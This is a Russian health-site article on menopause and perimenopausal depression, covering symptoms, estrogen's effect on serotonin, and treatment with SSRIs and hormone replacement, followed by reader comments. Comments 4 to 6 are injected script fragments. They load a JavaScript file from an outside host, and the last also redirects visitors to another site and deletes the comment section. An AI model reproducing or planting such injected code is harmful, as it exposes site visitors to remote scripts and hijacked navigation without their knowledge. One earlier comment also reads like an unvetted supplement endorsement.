Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как не сойти с ума после ...  >>  Как не сойти с ума после климакса
 
Обратная связь
 

Как не сойти с ума после климакса

Размер шрифта
06 июня 2013 00:00
  • google_analytics: false
  • Нравится

Многие женщины приходят в ужас от одного только слова «климакс» в связи с распространенным в быту мнением, что с наступлением климакса и последующей менопаузы «жизнь заканчивается».

Безусловно, эти утверждения не беспочвенны, так как в климактерический период в организме женщины происходит множество изменений, в том числе и в психо-эмоциональной сфере. Однако в современной медицине уже давно существует множество способов борьбы с негативными последствиями климакса и периода менопаузы.

Что такое менопауза

Менопауза – это полная остановка менструаций у женщины в результате прекращения функции яичников. О достижении женщиной менопаузы говорят, если со времени последней менструации прошло не менее 1 года. Естественная менопауза связана с возрастным истощением запаса фолликулов в яичниках (фолликулярного резерва). Фолликулярный резерв – это запрограммированное еще до рождения женщины количество яйцеклеток и менструальных циклов на всю жизнь.

В норме менопауза наступает в возрасте от 45 до 55 лет, но может быть ранней (40-45 лет) или поздней (в возрасте старше 55 лет).

Какова физиология менопаузы

Также выделяют периоды предменопаузы, перименопаузы и постменопаузы. Предменопаузу и менопаузу объединяют в климактерический период.

Перименопауза (менопаузальный переход) – это период между появлением нерегулярных менструальных циклов и последней менструацией, который сопровождается колебаниями репродуктивных гормонов и характеризуется следующими изменениями:

  • Нерегулярные менструальные циклы
  • Длительные и обильные месячные с эпизодами аменореи
  • Снижение репродуктивной функции
  •  Бессонница и нарушения сна

Именно во время менопаузального перехода уровень эстрогена понижается, а уровни гормонов гипофиза, а именно фолликулостимулирующего гормона (ФСГ) и лютеинезирующего гормона (ЛГ), в ответ на это повышаются.

Колебания уровня эстрогена влияет на весь организм, в том числе и на психическое состояние женщины.

Что происходит с организмом женщины во время менопаузы

  • Приливы жара. Их отмечает 80% женщин. С приливами также связаны нарушения сна и ночная потливость.
  • Изменения настроения. Нередки депрессивные состояния.
  • Снижение полового влечения от легкой степени до полной потери интереса к сексу.
  • Сухость влагалища, затрудняющая половой акт и нередко способствующая присоединению инфекции.
  • Учащение мочеиспускания, склонность к инфекциям мочевого пузыря.
  • Уменьшение размеров и дряблость молочных желез.
  • Сухость и снижение эластичности кожи, появление глубоких морщин, поседение волос.
  • Остеопороз, изменение осанки.
  • Потребность ночью вставать в туалет.
  • Сухость глаз.

Примерно у 20% всех женщин возникает депрессия на разных этапах во время менопаузы.

Ученые из Гарвардского Исследования Настроения и Циклов собрали группу пременопаузальных женщин в возрасте 36-44 лет без депрессии в анамнезе. Они следили за этими женщинами в течение 9 лет, чтобы заметить начало депрессии. Они обнаружили, что женщины в перименопаузе имеют в 2 раза больше шансов перенести клинически значимые депрессивные симптомы, чем те, кто еще не достиг этого периода.

Половые гормоны, которые продуцируются во время менопаузы, влияют на изменения в настроении. Пониженный уровень эстрогенов, повышенный уровень тестостерона может напрямую приводить к симптомам депрессии во время менопаузального перехода.

Почему снижение эстрогенов вызывает депрессию

Эстрогены действуют на центральную нервную систему посредством различных механизмов. В первую очередь, эстрогены стимулируют синтез серотонина – гормона радости, увеличивают эффекты серотонина и норадреналина, которые являются нейротрансмиттерами, регулирующими настроение.

В менопаузу уровень эстрогенов падает, акивность серотонина и норадерналина уменьшается, в связи с чем развивается депрессия.

Как с этим бороться

Если каких-то гормонов стало меньше – их уровень надо восстановить или восполнить. Именно поэтому препараты для лечения перименопаузальной депрессии включают в себя антидепрессанты и женские половые гормоны (гормонозаместительная терапия).

1. Лечение депрессии – антидепрессанты.

Для депрессии антидепрессанты являются препаратом первой линии.

Селективные ингибиторы обратного захвата серотонина используются чаще всего при лечении перименопаузальной депрессии. Эти препараты блокируют работу транспортеров обратного захвата в нервных клетках головного мозга, оставляя больше серотонина внутри нервной клетки.

2. Восполнение женских гормонов.

Эстрогены могут быть использованы тогда, когда стандартные антидепрессанты не дали эффекта, когда пациенты отказываются принимать антидепрессанты, или когда у женщины имеются другие неблагоприятные симптомы климакса (приливы, остеопороз, сухость влагалища и другие).

Данные некоторых исследований говорят о том, что заместительная гормональная терапия препаратами женских половых гормонов имела выраженный антидепрессивный эффект и, кроме того, усилила эффект антидепрессантов у женщин в климактерический период.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

07 июня 2013 в 03:12

Цитировать   |   Пожаловаться

А еще расскажите об осложнениях после приёма ЗГТ и реальном риске онкологии. Это только у Малышевой всё прекрасно!

2 - Гость

07 июня 2013 в 11:27

Цитировать   |   Пожаловаться

вот именно,почему она не предупреждает о побочных. после ее рекламы женщины кинулись в аптеку за гормонами,почему я провизор с 25 летним стажем обьясняю о последствиях?какое право имеет Малышева так отзываться об аптечных работниках?,сегодня  смотрела ее передачу где она ругала аптеку. мы же не с улицы пришли,тоже учились. да у нас в районе для некоторых заболевших, аптека это единственное спасение,т.к. мед. помощь не доступна.

3 - Гость

10 октября 2013 в 18:12

Цитировать   |   Пожаловаться

Само собой средств, которые можно облегчить симптомы климакса сейчас уже хватает, все таки наука не стоит на месте. Но ведь надо еще выбрать тот, что действительно помогает и не вызывает кучу побочных эффектов. Мне нравится, до этого пробовала и Климакан и Ременс.  можно долго принимать, он действительно облегчает все симптомы, и помогает не развиться остеопорозу, для многих это актуально.

4 - zzzzzz

30 июня 2015 в 19:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 23:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Боретесь с климаксом – не ослепнете!   Где вы живете – ответит на вопрос, когда у вас будет диабет! Где же надо жить?   Старые симптомы – новые проблемы   Если баланс гормонов нарушен  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 27 мая 2013Почему женщины толстеют после 45? Как этого избежать?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Причины депрессии после 40
Как обмануть время и выглядеть молодой после 45?
Женское здоровье

Тесты

1
Как облегчить менопаузу?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.